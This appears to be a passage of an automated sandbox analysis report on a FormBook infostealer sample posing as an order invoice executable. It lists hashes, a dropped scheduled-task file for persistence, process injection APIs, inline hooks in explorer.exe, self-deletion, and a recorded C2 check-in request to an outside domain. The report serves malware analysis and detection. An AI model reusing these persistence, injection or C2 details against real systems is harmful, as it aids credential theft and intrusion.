                                    SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:B666A4404B132B2BF6C04FBF848EB948
                                    SHA1:D2EFB3D43F8B8806544D3A47F7DAEE8534981739
                                    SHA-256:7870616D981C8C0DE9A54E7383CD035470DB20CBF75ACDF729C32889D4B6ED96
                                    SHA-512:00E955EE9F14CEAE07E571A8EF2E103200CF421BAE83A66ED9F9E1AA6A9F449B653EDF1BFDB662A364D58ECF9B5FE4BB69D590DB2653F2F46A09F4D47719A862
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    C:\Users\user\AppData\Local\Temp\tmp285B.tmp
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1643
                                    Entropy (8bit):5.188830651763348
                                    Encrypted:false
                                    SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBAtn:cbh47TlNQ//rydbz9I3YODOLNdq3Y
                                    MD5:56D17E4A40FC6692A30DDC6AB12DEA7A
                                    SHA1:FFDD7B9D79A37F71C7AD8DDFEA48CC2C48981951
                                    SHA-256:6BDE14E7796411E51AEF9BBAABAA4BFDCD1682BB8024B85F82174BC036967A9E
                                    SHA-512:63AE291BC4CA864EE06F0A1FF086683AD39F86FDE937CE37F12DFF0DE9623DF2CC0228EB8A0F772E26601AA1A1971DA53F05810AEC7350E47300907C53865550
                                    Malicious:true
                                    Reputation:low
                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                    C:\Users\user\AppData\Roaming\EDclkRlYpO.exe
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):954880
                                    Entropy (8bit):7.108829775586779
                                    Encrypted:false
                                    SSDEEP:12288:yhS4xbbDSZqDULqJeVC/59xQ0tmvkZjsn+o2JUHVe6zDXhscccku2sX8EFObPpan:yhPx7JeMhY0t/i2JUHVe6zbO/u2a
                                    MD5:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    SHA1:B0E2841F5C7D754E4AF796088B659C204EDF5FD8
                                    SHA-256:6E556200DBA57FDCE36308BBD34C19398ECF627828627B380244AEEDE2F90176
                                    SHA-512:ACF43373CAB61D80264A27B961C0E2FB0753458A73F9A6CF651C27089F81178E85A91B9309503295C6CCD94C2395C1EEEEBB629C95B25F719556480D8395A58A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 29%, Browse
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Reputation:low

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.108829775586779
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:Order 275594 04-D4E5A.exe
                                    File size:954880
                                    MD5:3f4cc7f69f0d3b70a20dfd2243bc16db
                                    SHA1:b0e2841f5c7d754e4af796088b659c204edf5fd8
                                    SHA256:6e556200dba57fdce36308bbd34c19398ecf627828627b380244aeede2f90176
                                    SHA512:acf43373cab61d80264a27b961c0e2fb0753458a73f9a6cf651c27089f81178e85a91b9309503295c6ccd94c2395c1eeeebb629c95b25f719556480d8395a58a
                                    SSDEEP:12288:yhS4xbbDSZqDULqJeVC/59xQ0tmvkZjsn+o2JUHVe6zDXhscccku2sX8EFObPpan:yhPx7JeMhY0t/i2JUHVe6zbO/u2a

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4e9a6e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x60C16C21 [Thu Jun 10 01:34:25 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe9a18 | 0x53 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xea000 | 0x10f8 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xec000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0xe7a74 | 0xe7c00 | False | 0.670548686961 | data | 7.11280635701 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0xea000 | 0x10f8 | 0x1200 | False | 0.376953125 | data | 4.90679046803 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0xec000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_VERSION | 0xea0a0 | 0x32c | data | |
                                    RT_MANIFEST | 0xea3cc | 0xd25 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                    Imports

                                    DLL | Import
                                    mscoree.dll | _CorExeMain

                                    Version Infos

                                    Description | Data
                                    Translation | 0x0000 0x04b0
                                    LegalCopyright | Copyright 2017 - 2021
                                    Assembly Version | 1.0.0.0
                                    InternalName | EhBr.exe
                                    FileVersion | 1.0.0.0
                                    CompanyName |
                                    LegalTrademarks |
                                    Comments |
                                    ProductName | Pharmacy POS
                                    ProductVersion | 1.0.0.0
                                    FileDescription | Pharmacy POS
                                    OriginalFilename | EhBr.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    06/11/21-13:30:58.385090 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.3 | 184.168.131.241
                                    06/11/21-13:30:58.385090 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.3 | 184.168.131.241
                                    06/11/21-13:30:58.385090 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.3 | 184.168.131.241

                                    Network Port Distribution

                                    TCP Packets


                                    UDP Packets


                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Jun 11, 2021 13:30:58.111545086 CEST | 192.168.2.3 | 8.8.8.8 | 0x8be3 | Standard query (0) | www.filmarabia.com | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Jun 11, 2021 13:30:58.175209999 CEST | 8.8.8.8 | 192.168.2.3 | 0x8be3 | No error (0) | www.filmarabia.com | filmarabia.com | | CNAME (Canonical name) | IN (0x0001)
                                    Jun 11, 2021 13:30:58.175209999 CEST | 8.8.8.8 | 192.168.2.3 | 0x8be3 | No error (0) | filmarabia.com | | 184.168.131.241 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.filmarabia.com

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49750 | 184.168.131.241 | 80 | C:\Windows\explorer.exe

                                    Timestamp | kBytes transferred | Direction | Data
                                    Jun 11, 2021 13:30:58.385090113 CEST | 5174 | OUT | GET /dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE HTTP/1.1
                                    Host: www.filmarabia.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jun 11, 2021 13:30:58.625556946 CEST | 5175 | IN | HTTP/1.1 301 Moved Permanently
                                    Server: nginx/1.16.1
                                    Date: Fri, 11 Jun 2021 11:30:58 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function Name | Hook Type | Active in Processes
                                    PeekMessageA | INLINE | explorer.exe
                                    PeekMessageW | INLINE | explorer.exe
                                    GetMessageW | INLINE | explorer.exe
                                    GetMessageA | INLINE | explorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function Name | Hook Type | New Data
                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEC
                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEC

                                    System Behavior

                                    General

                                    Start time:13:29:02
                                    Start date:11/06/2021
                                    Path:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
                                    Imagebase:0x10000
                                    File size:954880 bytes
                                    MD5 hash:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:13:29:45
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'
                                    Imagebase:0x20000
                                    File size:185856 bytes
                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:13:29:46
                                    Start date:11/06/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6b2800000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:13:29:49
                                    Start date:11/06/2021
                                    Path:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xe00000
                                    File size:954880 bytes
                                    MD5 hash:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:13:29:52
                                    Start date:11/06/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:
                                    Imagebase:0x7ff714890000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:13:30:16
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                    Imagebase:0x1130000
                                    File size:44520 bytes
                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:13:30:20
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
                                    Imagebase:0xa0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:13:30:20
                                    Start date:11/06/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6b2800000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                      Executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 278$lMOm$lMOm
                                      • API String ID: 0-1565864076
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 278$lMOm
                                      • API String ID: 0-2876074530
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: `&^<
                                      • API String ID: 0-771038736
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: `&^<
                                      • API String ID: 0-771038736
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00AAFE08
                                      • GetCurrentThread.KERNEL32 ref: 00AAFE45
                                      • GetCurrentProcess.KERNEL32 ref: 00AAFE82
                                      • GetCurrentThreadId.KERNEL32 ref: 00AAFEDB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 044626AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 044626AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00AA9571
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462D46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462D46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462AF5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462AF5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04462C0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04462C0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 00AADF02
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AA2CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      Uniqueness

